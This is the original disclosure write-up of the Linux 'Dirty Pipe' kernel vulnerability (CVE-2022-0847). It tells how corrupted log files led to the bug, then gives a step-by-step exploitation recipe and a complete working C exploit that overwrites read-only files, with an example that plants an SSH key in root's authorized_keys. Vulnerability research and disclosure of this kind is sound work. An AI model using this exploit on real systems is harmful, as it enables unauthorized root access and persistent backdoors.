The Dirty Pipe Vulnerability

Max Kellermann <max.kellermann@ionos.com>

Abstract

This is the story of CVE-2022-0847, a vulnerability in the Linux
kernel since 5.8 which allows overwriting data in arbitrary read-only
files. This leads to privilege escalation because unprivileged
processes can inject code into root processes.

It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.

The vulnerability was fixed
in Linux 5.16.11, 5.15.25 and 5.10.102.

Corruption pt. I

It all started a year ago with a support ticket about corrupt files.
A customer complained that the access logs they downloaded could not
be decompressed. And indeed, there was a corrupt log file on one of
the log servers; it could be decompressed, but gzip reported a CRC
error. I could not explain why it was corrupt, but I assumed the
nightly split process had crashed and left a corrupt file behind. I
fixed the file’s CRC manually, closed the ticket, and soon forgot
about the problem.

Months later, this happened again and yet again. Every time, the
file’s contents looked correct, only the CRC at the end of the file
was wrong. Now, with several corrupt files, I was able to dig deeper
and found a surprising kind of corruption. A pattern emerged.

Access Logging

Let me briefly introduce how our log server works: In the CM4all
hosting environment, all web servers (running our custom open source
HTTP server) send UDP
multicast datagrams with metadata about each HTTP request. These are
received by the log servers running Pond, our custom open source in-memory
database. A nightly job splits all access logs of the previous day
into one per hosted web site, each compressed with zlib.

Via HTTP, all access logs of a month can be downloaded as a single
.gz file. Using a trick (which involves Z_SYNC_FLUSH), we can
just concatenate all gzipped daily log files without having to
decompress and recompress them, which means this HTTP request consumes
nearly no CPU. Memory bandwidth is saved by employing the
splice() system call to feed data directly from the hard disk into
the HTTP connection, without passing the kernel/userspace boundary
(“zero-copy”).
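
The zero-copy transfer described above can be sketched roughly as follows. This is a minimal illustration, assuming Linux and assuming the destination descriptor is a pipe (splice() needs a pipe on at least one side). The helper name splice_file_to_pipe is hypothetical and not taken from the CM4all code.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: move up to `len` bytes from the regular file
 * `file_fd` into the pipe `pipe_fd` without copying them through a
 * userspace buffer. Returns the number of bytes moved, or -1 on error. */
static ssize_t splice_file_to_pipe(int file_fd, int pipe_fd, size_t len)
{
	size_t total = 0;

	while (total < len) {
		/* NULL offsets: use (and advance) the file's own position */
		ssize_t n = splice(file_fd, NULL, pipe_fd, NULL, len - total, 0);
		if (n < 0)
			return -1;
		if (n == 0) /* end of file */
			break;
		total += (size_t)n;
	}

	return (ssize_t)total;
}
```

Note that the call blocks once the pipe is full, so something has to read from the other end when more than the pipe's capacity is transferred.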

Windows users can’t handle .gz files, but everybody can extract
ZIP files. A ZIP file is just a container for .gz files, so we
could use the same method to generate ZIP files on-the-fly; all we
needed to do was send a ZIP header first, then concatenate all .gz
file contents as usual, followed by the central directory (another
kind of header).

Corruption pt. II

This is how the end of a proper daily file looks:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 9c 12 0b f5 f7 4a  00 00

The 00 00 ff ff is the sync flush which allows
simple concatenation. 03 00 is an empty “final” block, and is
followed by a CRC32 (0xf50b129c) and the uncompressed file length
(0x00004af7 = 19191 bytes).
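
To make the byte order explicit, here is a small sketch that decodes the 8-byte gzip trailer from the hexdump above. Both fields are stored little-endian. The struct and function names are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* The 8-byte gzip trailer: CRC32 followed by the uncompressed length,
 * both little-endian. Names are illustrative only. */
struct gzip_trailer {
	uint32_t crc32; /* CRC-32 of the uncompressed data */
	uint32_t isize; /* uncompressed length modulo 2^32 */
};

static uint32_t read_le32(const uint8_t *p)
{
	return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
	       ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode the trailer from the last 8 bytes of `data`.
 * Returns 0 on success, -1 if the buffer is too short. */
static int parse_gzip_trailer(const uint8_t *data, size_t size,
                              struct gzip_trailer *out)
{
	if (size < 8)
		return -1;

	out->crc32 = read_le32(data + size - 8);
	out->isize = read_le32(data + size - 4);
	return 0;
}
```

Fed with the last ten bytes of the dump (03 00 9c 12 0b f5 f7 4a 00 00), this yields a CRC32 of 0xf50b129c and a length of 19191.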

The same file but corrupted:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 50 4b 01 02 1e 03  14 00

The sync flush is there, the empty final block is there, but the
uncompressed length is now 0x0014031e = 1.3 MB (that’s wrong, it’s
the same 19 kB file as above). The CRC32 is 0x02014b50, which
does not match the file contents. Why? Is this an out-of-bounds
write or a heap corruption bug in our log client?

I compared all known-corrupt files and discovered, to my surprise,
that all of them had the same CRC32 and the same “file length” value.
Always the same CRC - this implies that this cannot be the result of a
CRC calculation. With corrupt data, we would see different (but
wrong) CRC values. For hours, I stared holes into the code but could
not find an explanation.

Then I stared at these 8 bytes. Eventually, I realized that 50 4b
is ASCII for “P” and “K”. “PK”, that’s how all ZIP headers start.
Let’s have a look at these 8 bytes again:

  • 50 4b is “PK”

  • 01 02 is the code for central directory file header.

  • “Version made by” = 1e 03; 0x1e = 30 (3.0); 0x03 = UNIX

  • “Version needed to extract” = 14 00; 0x0014 = 20 (2.0)

The rest is missing; the header was apparently truncated after 8
bytes.
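
The field-by-field reading above can be expressed as a short decoder. This is only a sketch of the first 8 bytes of a ZIP central directory file header; the struct and function names are invented for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* "PK\x01\x02" read as a little-endian 32-bit value */
#define ZIP_CDFH_SIGNATURE 0x02014b50u

/* First fields of a central directory file header (illustrative names) */
struct zip_cdfh_prefix {
	uint8_t spec_version;    /* "version made by", low byte: 30 means 3.0 */
	uint8_t host_system;     /* "version made by", high byte: 3 means UNIX */
	uint16_t version_needed; /* "version needed to extract": 20 means 2.0 */
};

/* Returns 0 if `p` starts with a central directory file header,
 * -1 if it is too short or the signature does not match. */
static int parse_zip_cdfh_prefix(const uint8_t *p, size_t size,
                                 struct zip_cdfh_prefix *out)
{
	if (size < 8)
		return -1;

	const uint32_t signature = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
	                           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
	if (signature != ZIP_CDFH_SIGNATURE)
		return -1;

	out->spec_version = p[4];
	out->host_system = p[5];
	out->version_needed = (uint16_t)(p[6] | (p[7] << 8));
	return 0;
}
```

Applied to the 8 corrupt bytes, it reports version 30 made on host system 3 and version 20 needed to extract; applied to the intact trailer, it rejects the signature.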

This is really the beginning of a ZIP central directory file header,
this cannot be a coincidence. But the process which writes these
files has no code to generate such a header. In my desperation, I looked
at the zlib source code and all other libraries used by that process
but found nothing. This piece of software doesn’t know anything about
“PK” headers.

There is one process which generates “PK” headers, though; it’s the
web service which constructs ZIP files on-the-fly. But this process
runs as a different user which doesn’t have write permissions on these
files. It cannot possibly be that process.

None of this made sense, but new support tickets kept coming in (at a
very slow rate). There was some systematic problem, but I just
couldn’t get a grip on it. That gave me a lot of frustration, but
I was busy with other tasks, and I kept pushing this file corruption
problem to the back of my queue.

Corruption pt. III

External pressure brought this problem back into my consciousness. I
scanned the whole hard disk for corrupt files (which took two days),
hoping for more patterns to emerge. And indeed, there was a pattern:

  • there were 37 corrupt files within the past 3 months

  • they occurred on 22 unique days

  • 18 of those days have 1 corruption

  • 1 day has 2 corruptions (2021-11-21)

  • 1 day has 7 corruptions (2021-11-30)

  • 1 day has 6 corruptions (2021-12-31)

  • 1 day has 4 corruptions (2022-01-31)

The last day of each month is clearly the one on which most
corruptions occur.

Only the primary log server had corruptions (the one which served HTTP
connections and constructed ZIP files). The standby server (HTTP
inactive but same log extraction process) had zero corruptions. Data
on both servers was identical, minus those corruptions.

Is this caused by flaky hardware? Bad RAM? Bad storage? Cosmic
rays? No, the symptoms don’t look like a hardware issue. A ghost in
the machine? Do we need an exorcist?

Man staring at code

I began staring holes into my code again, this time the web service.

Remember, the web service writes a ZIP header, then uses splice()
to send all compressed files, and finally uses write() again for
the “central directory file header”, which begins with 50 4b 01 02
1e 03 14 00, exactly the corruption. The data sent over the wire
looks exactly like the corrupt files on disk. But the process sending
this on the wire has no write permissions on those files (and doesn’t
even try to do so), it only reads them. Against all odds and against
the impossible, it must be that process which causes corruptions,
but how?

My first flash of inspiration explained why it’s always the last day
of the month which gets corrupted. When a website owner downloads the access
log, the server starts with the first day of the month, then the
second day, and so on. Of course, the last day of the month is
sent at the end; the last day of the month is always followed by the
“PK” header. That’s why it’s more likely to corrupt the last day.
(The other days can be corrupted if the requested month is not yet
over, but that’s less likely.)

How?

Man staring at kernel code

After being stuck for more hours, after eliminating everything that
was definitely impossible (in my opinion), I drew a conclusion: this
must be a kernel bug.

Blaming the Linux kernel (i.e. somebody else’s code) for data
corruption must be the last resort. That is unlikely. The kernel is
an extremely complex project developed by thousands of individuals
with methods that may seem chaotic; despite this, it is extremely
stable and reliable. But this time, I was convinced that it must be a
kernel bug.

In a moment of extraordinary clarity, I hacked two C programs.

One that keeps writing odd chunks of the string “AAAAA” to a file
(simulating the log splitter):

#include <unistd.h>
int main(int argc, char **argv) {
  for (;;) write(1, "AAAAA", 5);
}
// ./writer >foo

And one that keeps transferring data from that file to a pipe using
splice() and then writes the string “BBBBB” to the pipe
(simulating the ZIP generator):

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv) {
  for (;;) {
    splice(0, 0, 1, 0, 2, 0);
    write(1, "BBBBB", 5);
  }
}
// ./splicer <foo |cat >/dev/null

I copied those two programs to the log server, and… bingo! The
string “BBBBB” started appearing in the file, even though nobody ever
wrote this string to the file (only to the pipe by a process without
write permissions).

So this really is a kernel bug!

All bugs become shallow once they can be reproduced. A quick check
verified that this bug affects Linux 5.10 (Debian Bullseye) but not
Linux 4.19 (Debian Buster). There are 185,011 git commits between
v4.19 and v5.10, but thanks to git bisect, it takes just 17 steps
to locate the faulty commit.
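
The step count follows from repeated halving: log2(185011) is about 17.5. The function below is a back-of-the-envelope sketch that assumes a linear history; real git bisect walks a commit graph, so its own estimate can differ by a step. The function name is made up for this example.

```c
/* Number of times a range of `commits` candidates can be halved before
 * a single one remains, i.e. floor(log2(commits)). */
static unsigned bisect_steps(unsigned long commits)
{
	unsigned steps = 0;

	while (commits > 1) {
		commits /= 2;
		++steps;
	}

	return steps;
}
```

For 185011 commits this returns 17.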

The bisect arrived at commit f6dd975583bd,
which refactors the pipe buffer code for anonymous pipe buffers. It
changes how the “mergeable” check is done for pipes.

Pipes and Buffers and Pages

Why pipes, anyway? In our setup, the web service which generates ZIP
files communicates with the web server over pipes; it speaks the Web
Application Socket protocol,
which we invented because we were not happy with CGI, FastCGI and AJP.
Using pipes instead of multiplexing over a socket (like FastCGI and
AJP do) has a major advantage: you can use splice() in both the
application and the web server for maximum efficiency. This reduces
the overhead for having web applications out-of-process (as opposed
to running web services inside the web server process, like Apache
modules do). This allows privilege separation without sacrificing
(much) performance.

Short detour on Linux memory management:
The smallest unit of memory managed by the CPU is a page (usually
4 kB). Everything in the lowest layer of Linux’s memory management is
about pages. If an application requests memory from the kernel, it
will get a number of (anonymous) pages. All file I/O is also about
pages: if you read data from a file, the kernel first copies a number
of 4 kB chunks from the hard disk into kernel memory, managed by a
subsystem called the page cache. From there, the data will be
copied to userspace. The copy in the page cache remains for some
time, where it can be used again, avoiding unnecessary hard disk I/O,
until the kernel decides it has a better use for that memory
(“reclaim”). Instead of copying file data to userspace memory, pages
managed by the page cache can be mapped directly into userspace using
the mmap() system call (a trade-off for reduced memory bandwidth
at the cost of increased page faults and TLB flushes). The Linux
kernel has more tricks: the sendfile() system call allows an
application to send file contents into a socket without a roundtrip to
userspace (an optimization popular in web servers serving static files
over HTTP). The splice() system call is kind of a generalization
of sendfile(): It allows the same optimization if either side of
the transfer is a pipe; the other side can be almost anything
(another pipe, a file, a socket, a block device, a character device).
The kernel implements this by passing page references around, not
actually copying anything (zero-copy).
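
As a small illustration of the mmap() path mentioned above, the following sketch reads a file through a read-only mapping of its page cache pages instead of copying it with read(). The helper name and the byte-sum task are arbitrary choices for this example.

```c
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: add up all bytes of a file by mapping it
 * read-only. Returns the sum, or -1 on error or for an empty file. */
static long sum_file_bytes_mmap(const char *path)
{
	const int fd = open(path, O_RDONLY);
	if (fd < 0)
		return -1;

	struct stat st;
	if (fstat(fd, &st) < 0 || st.st_size == 0) {
		close(fd);
		return -1;
	}

	const unsigned char *p = mmap(NULL, (size_t)st.st_size, PROT_READ,
	                              MAP_SHARED, fd, 0);
	close(fd); /* the mapping stays valid after close() */
	if (p == MAP_FAILED)
		return -1;

	long sum = 0;
	for (off_t i = 0; i < st.st_size; ++i)
		sum += p[i]; /* each first touch of a page may fault it in */

	munmap((void *)p, (size_t)st.st_size);
	return sum;
}
```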

A pipe is a tool for unidirectional inter-process communication.
One end is for pushing data into it, the other end can pull that data.
The Linux kernel implements this by a ring of struct pipe_buffer,
each referring to a page. The first write to a pipe allocates a
page (space for 4 kB worth of data). If the most recent write does
not fill the page completely, a following write may append to that
existing page instead of allocating a new one. This is how
“anonymous” pipe buffers work (anon_pipe_buf_ops).

If you, however, splice() data from a file into the pipe, the
kernel will first load the data into the page cache. Then it will
create a struct pipe_buffer pointing inside the page cache
(zero-copy), but unlike anonymous pipe buffers, additional data
written to the pipe must not be appended to such a page because the
page is owned by the page cache, not by the pipe.
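
The rule from the last two paragraphs fits into one predicate. This is a deliberately simplified userspace model, not kernel code: the type and function names are invented, and page ownership is modelled as an explicit enum rather than the mechanism the kernel actually uses.

```c
#include <stdbool.h>

#define MODEL_PAGE_SIZE 4096u

/* Who owns the page a buffer refers to (model only) */
enum model_owner { OWNER_PIPE, OWNER_PAGE_CACHE };

struct model_buf {
	enum model_owner owner;
	unsigned offset; /* start of the data within the page */
	unsigned len;    /* number of data bytes */
};

/* May a write of `n` bytes be appended to the most recent buffer?
 * Only if the pipe owns the page and the data still fits into it. */
static bool model_can_append(const struct model_buf *last, unsigned n)
{
	return last->owner == OWNER_PIPE &&
	       last->offset + last->len + n <= MODEL_PAGE_SIZE;
}
```

A buffer created by splice() from a file would carry OWNER_PAGE_CACHE in this model, so the predicate is false for it no matter how much room the page has left.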

History of the check for whether new data can be appended to an
existing pipe buffer:

Over the years, this check was refactored back and forth, which was
okay. Or was it?

Uninitialized

Several years before PIPE_BUF_FLAG_CAN_MERGE was born, commit
241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016)
added two new functions which allocate a new struct pipe_buffer,
but initialization of its flags member was missing. It was now
possible to create page cache references with arbitrary flags, but
that did not matter. It was technically a bug, though without
consequences at that time because all of the existing flags were
rather boring.

This bug suddenly became critical in Linux 5.8 with commit
f6dd975583bd “pipe: merge anon_pipe_buf*_ops”.
By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference,
it became possible to overwrite data in the page cache, simply by
writing new data into the pipe prepared in a special way.
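
The effect of the missing initialization can be reproduced in a toy userspace model of the ring. Everything here is a simplification for illustration: the names are invented, the ring has only 4 slots, there are no capacity checks (writes are assumed to be at most one page and the ring is assumed never to overflow), and MODEL_CAN_MERGE merely stands in for PIPE_BUF_FLAG_CAN_MERGE.

```c
#include <string.h>

#define MODEL_PAGE_SIZE 4096u
#define MODEL_RING_SIZE 4u
#define MODEL_CAN_MERGE 0x1u

struct model_buf {
	char *page;
	unsigned offset, len, flags;
};

struct model_pipe {
	struct model_buf bufs[MODEL_RING_SIZE];
	unsigned head, tail; /* head: next slot to fill; tail: oldest in use */
	char anon_pages[MODEL_RING_SIZE][MODEL_PAGE_SIZE];
};

/* write(): append to the newest buffer if it is flagged mergeable and
 * has room, otherwise start a new anonymous buffer. */
static void model_write(struct model_pipe *p, const char *data, unsigned len)
{
	if (p->head != p->tail) {
		struct model_buf *last = &p->bufs[(p->head - 1) % MODEL_RING_SIZE];
		const unsigned end = last->offset + last->len;
		if ((last->flags & MODEL_CAN_MERGE) && end + len <= MODEL_PAGE_SIZE) {
			memcpy(last->page + end, data, len);
			last->len += len;
			return;
		}
	}

	struct model_buf *b = &p->bufs[p->head % MODEL_RING_SIZE];
	b->page = p->anon_pages[p->head % MODEL_RING_SIZE];
	b->offset = 0;
	b->len = len;
	b->flags = MODEL_CAN_MERGE;
	memcpy(b->page, data, len);
	p->head++;
}

/* read(): release the oldest slot, leaving its flags untouched */
static void model_drain_one(struct model_pipe *p)
{
	if (p->head != p->tail)
		p->tail++;
}

/* splice() with the bug: every field except `flags` is set, so the
 * slot keeps whatever its previous user left behind. */
static void model_splice_buggy(struct model_pipe *p, char *cache_page,
                               unsigned offset, unsigned len)
{
	struct model_buf *b = &p->bufs[p->head % MODEL_RING_SIZE];
	b->page = cache_page;
	b->offset = offset;
	b->len = len;
	p->head++;
}
```

Filling every slot with a full-page write, draining them all, then calling model_splice_buggy() followed by model_write() makes the written bytes land in cache_page, which stands in for the page cache here.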

Corruption pt. IV

This explains the file corruption: First, some data gets written into
the pipe, then lots of files get spliced, creating page cache
references. Randomly, those may or may not have
PIPE_BUF_FLAG_CAN_MERGE set. If yes, then the write() call
that writes the central directory file header will write into the
page cache of the last compressed file.

But why only the first 8 bytes of that header? Actually, all of the
header gets copied to the page cache, but this operation does not
increase the file size. The original file had only 8 bytes of
“unspliced” space at the end, and only those bytes can be overwritten.
The rest of the page is unused from the page cache’s perspective
(though the pipe buffer code does use it because it has its own page
fill management).
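
The arithmetic behind the 8 bytes can be written down as a tiny helper. The numbers plugged in afterwards are assumptions derived from the hexdump: the file is 0x60a bytes long, the splice stopped at 0x602 (right before the gzip trailer), and a ZIP central directory file header has a fixed part of 46 bytes. The function name is hypothetical.

```c
#include <stddef.h>

/* How many bytes of a merged pipe write end up inside the file?
 * Only the part between the end of the spliced range and the end of
 * the file is visible; the file size itself never changes. */
static size_t visible_overwrite(size_t file_size, size_t splice_end,
                                size_t write_len)
{
	const size_t room = file_size > splice_end ? file_size - splice_end : 0;
	return write_len < room ? write_len : room;
}
```

With those values, visible_overwrite(0x60a, 0x602, 46) is 8, which matches the 8 corrupted bytes at the end of each file.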

And why does this not happen more often? Because the page cache does
not write back to disk unless it believes the page is “dirty”.
Accidentally overwriting data in the page cache will not make the page
“dirty”. If no other process happens to “dirty” the file, this change
will be ephemeral; after the next reboot (or after the kernel decides
to drop the page from the cache, e.g. reclaim under memory pressure),
the change is reverted. This allows interesting attacks without
leaving a trace on hard disk.

Exploiting

In my first exploit (the “writer” / “splicer” programs which I used
for the bisect), I had assumed that this bug is only exploitable while
a privileged process writes the file, and that it depends on timing.

When I realized what the real problem was, I was able to widen the
hole by a large margin: it is possible to overwrite the page cache
even in the absence of writers, with no timing constraints, at
(almost) arbitrary positions with arbitrary data. The limitations
are:

  • the attacker must have read permissions (because it needs to
    splice() a page into a pipe)

  • the offset must not be on a page boundary (because at least one byte
    of that page must have been spliced into the pipe)

  • the write cannot cross a page boundary (because a new anonymous
    buffer would be created for the rest)

  • the file cannot be resized (because the pipe has its own page fill
    management and does not tell the page cache how much data has been
    appended)

To exploit this vulnerability, you need to:

  1. Create a pipe.

  2. Fill the pipe with arbitrary data (to set the
    PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).

  3. Drain the pipe (leaving the flag set in all struct pipe_buffer
    instances on the struct pipe_inode_info ring).

  4. Splice data from the target file (opened with O_RDONLY) into
    the pipe from just before the target offset.

  5. Write arbitrary data into the pipe; this data will overwrite the
    cached file page instead of creating a new anonymous struct
    pipe_buffer because PIPE_BUF_FLAG_CAN_MERGE is set.

To make this vulnerability more interesting, it not only works without
write permissions, it also works with immutable files, on read-only
btrfs snapshots and on read-only mounts (including CD-ROM mounts).
That is because the page cache is always writable (by the kernel), and
writing to a pipe never checks any permissions.

This is my proof-of-concept exploit:

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}

Timeline
